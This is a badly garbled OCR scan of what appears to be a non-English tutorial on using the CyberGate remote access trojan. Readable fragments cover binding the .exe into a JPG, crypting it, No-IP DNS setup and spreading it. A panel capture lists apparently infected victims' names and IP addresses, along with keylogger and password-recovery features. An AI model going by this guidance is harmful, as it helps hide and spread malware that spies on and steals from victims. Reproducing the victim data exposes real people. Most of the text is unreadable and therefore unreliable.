V3(5l v3?TTTOTOT 3TO fllSblfl TOTO TO^Ti^ TO?T S *JI<K C 1 C p llt- t ofl\3?nfS'“ hfWfl I F1TO|[ CTOfeWF^TOffe TOPTF t?T <l%\3 C 5 1l c 10K c 1 3TO ^vb>lvb TO* ^ifa 

| oW froft TO ft\s>K<l Flt-^flvS^lR-jN TOFCTOT | \3(<q ^ ^'i c l(h t FFFT 3<N?I (bS®1 <M<I 3 ^YT^TTC^" 


| 3FF FTf^fTOTfSc 3?T TOTTO I TOTTO 3TOTF F RAT TOW ST TOTOTOF (W TOT FTSTTTOT F v 3ST .exe 3?T ? FFTOTO ^Vlfavsltfl'I'H [ 

| CTT^ TO CTO>T ^V8G TO ©] v3SW FF TOTO W* TOTO ©\3lt TOTTO 3TOF TOTFfl feft TO^TO vsTC^ TO FTO F ^ WFt 
i ^iiPbvsi?fii>i 3 to toff sff <ro cto^i frocs tof i frorfSN totf TOtroiF 3 ^ tototo \3 Revs toctot i vstf vtof to^t 3to^ R^ii cttft cro* i 

p fiK^&FlRi f®TF ^ifa (<l*ll c 1 3<Pbl (bS®1 <HflR TO* s\ FF TO I <l c 1<l fTOTSF ftvsiF W ^(.fl I 

I 

I 3M TOR7F TO3 CTO TOTTO FTOF 3TO&T TOftF TO wt*F^SF 3?T TOoS FT fTO[ FfF W^TTgSF fTOF FFTT vslVlPS^'flTH £ pTT CTOTOT CTO TO , TOT 

CTO CTOffe I fTOTSF 3$ C3TTO 3?T TOtTOfit CTOfe 3FF TOF M¥T TOTOF F TOf%TO[tTOF 3F TOT TOW TOTTO TO TO \3t TOTtFSTCF .exe $ 

| ftCW FTO ®WTOT ? p H**'CF$ 3Sf ^VlPC'vs'l^'flTH (TO TOTfTO fTO f%CTO ^ff&F TO\3 TOF 


p 3^ F^TO TO TO CTOTOT 3^ST W^T 3^ ^TC^T TOTTO TOTO TOT^ ^TToF C^ ^ TO Fv3?n I p? 3^T TO 3^ oTTTOT ^aTW STCW^ 
| <rfe TO fWRT I 3TOT OTTTOT ^ TO&W f&f%TO 3^ ^TvsTfT Fo ftlTO W# vsTTO fTO 3&F 3^R®^TO TOF 3WC^TTO $ FTO 
.exe FTO ®TT ©TO 3ST ^STt TOfw^ft ^rr \3^ ^Tpr TOT feTO TO^M TOV3 : = 

I 

3?" 3^“ <l|?^)|fl ^llfl ^SlTOiT^r 3\s FT^T 3^“ ^TO" \3 3\s ^ITO F ®TMT <I%I^T\3 <^flCv3 FFF TO* oTF Ff*T 3 Fff^T ®TT F 

| fTOTF 3^ST W^T^T 3^FS TO TO^F TOTOTOT I oTTfF ^ S ST fe'FSTW ^TF 3TO&T TOt^TF 3^ vST^TOTO fTO fFF ^ 

I 

I 

| JPG+FileBinder [ 3Sr fiF JPG froro 3^ to to^ TO\s tototot ] 

I 

1 

p O-crypter 


TOlf%° PT^JT fTO^iTTO TOTf WFF FTO FFF ^[vs FTOW FTO TOT 


P/W/W/W/W/W/W/W/W/M/W/W/W/W/W/M/W/W/W/W^^ 
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jsr R>«iw onft J&f fw ^rnsqg ? 


[ '5)15’K3 “Mlf! STITST sp <lMf>H<r> fSiP)>) (S(?rnT S'PTt'S «RTO S’ST 3 bC'3 ^ 


RFTF1F No-IP DNS m wrs^t srf a^K fPr wf ftcf 

FT\3TF tvslflfl FFF DNS ,3F\ FF FFpTF ilt% (FF fS<r>il<r> FTCF R^^CFTF HFTF ^>F \3 iP 
PtcfIf^ (Fit jf^ ft#tf >3f m3?nt <ff aFt ff 

RPTFTF FFFTF\3FTF (FF RTFFTCF FKFFFF <Pfl(.v3 FTFT FT (FF 


afFFT Sif arfFCR rf Ptf 2 


w w? ^ «w -;mffiwfiwi stw*m Cyber gate & turn w ®7W w/^ w ^ ?^is w / 


I -3)15’Kj <t>fiifi onw ’•njiPs srip? i pfBr Pi si's ?i 'MhP <hi < i 5 srrsrig <r>?i(.« fi^®t 

1 / 

| , RTF TjFFRT &T (FF F^F <3FX (F&TCF W FTFTF I 


Fpi (FTF fFp% Fife' (F RTRFRJ F>FTR FF RIF RW n^lfi F^F j 


| FfF FTFTF FfFFKF i)F\ fjJTFRF FTCF FT^F (F RTR^RJ FFCR FTF RWF CFPTYTF (FS\3FTF> ^TFTF FTFTFT fFF I -3ST RIFF fFFlfFR ,3FF?T fFFF I >3$ 
| fFfFW FFFvft (FFF (bS®i >3 RTpr CTFTF FFF fFRTCF fFl^TF fefF RTFRFF FFT ^TFT ^(vbtF RfbCF [ Spreading ] PlFF I 


| fFRKF ^FfF CF (Fvt RI^IQ FOT* ? 

I 

! 

| rtrftf cyber gate ^Smff St rrf fft ftfif cf^ rtrf$ fif ff°&f rtcf^ 3? S^rt cr rf rmf i rtf frrfftrtf rft Puff fP It 

| OFFTF F^F I 


Computer / User 
MARCUS-PC/Marcus 
78.54.212.166/192.168... MARCO-PC/Marco 
78.49.66.93/78.49.66.93 BIE/andreas 
88.76.154.109/192.168... STEVE-PC/Steve 


Windows XP Professional (.. 


Intel(R) Core(TM... 
Intel(R) Core(TM... 
Intel(R) CoreCTM... 
AMD Sempron(t... 


2,00 GB Not Found 


/ir Desktop v9.0.1.32 / Not Found 


Thu, Jun 24,2010 09:10 AM 

MARCUS-PC/Marcus @212 181 150.157/! = : . 

MARCO-PC/Marco @ 78.54212.1667192 168178.21 - Server Connected 
BIE/andreas @ 78 49 66.93/78.49.66 93 - Server Connected 
STEVE-PC/Steve @ 88.76.154.109/192.168.1.2 - Server Connected 


I Clear ] 


CyberGate Initialized... 


^TfF“ f*T^F fFOTF FFTT FFTF FiFT RTFTF ^[vs FFTF FiFT FF 
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| OaT W i^TsT ? R>©IW ^7I&T3 i>8 frf W ? ^ 

! 

p rr ss St k_\3 fr cyber gate (sjr v»w ^r 3^Sr rt^S fw^ Rrf% sr (\sr RfRR rvd i fttbfi rIr Sr ot^r ^ 



»• Remote desktop 

logger 

A Password recovery 


i DOS Prompt 
QuKk Search... 


i Downloads 


Thu. Jon 2a. 2 


3$F!>T ! RR f%^ (\3l RTf% (R^ RCR !/ vsRSR \3 (3RR feTPRT Wf fRfifaR HR ‘FfjR (A3 I \57R «TTRT , i TM 5 T RRT , ^fMvDl 

stffR ^5" 2 n^®T I 


p wx - x 

| fRCR (bS «1 R^TR FR RR ^ fRRFF HTRR I RR ^ ^fl lb I HvFR 3RT RHW RRRR RTHRFF ©RRl 


R t% 


R7f%° f¥}R f^RiR RRT ^fllfl ^RT RRR ^fvs <T><q|<q ^RT RR 


P/W/W/W/W/W/W/W/W/M/W/W/W/W/W/M/W/W/W/W^^ 
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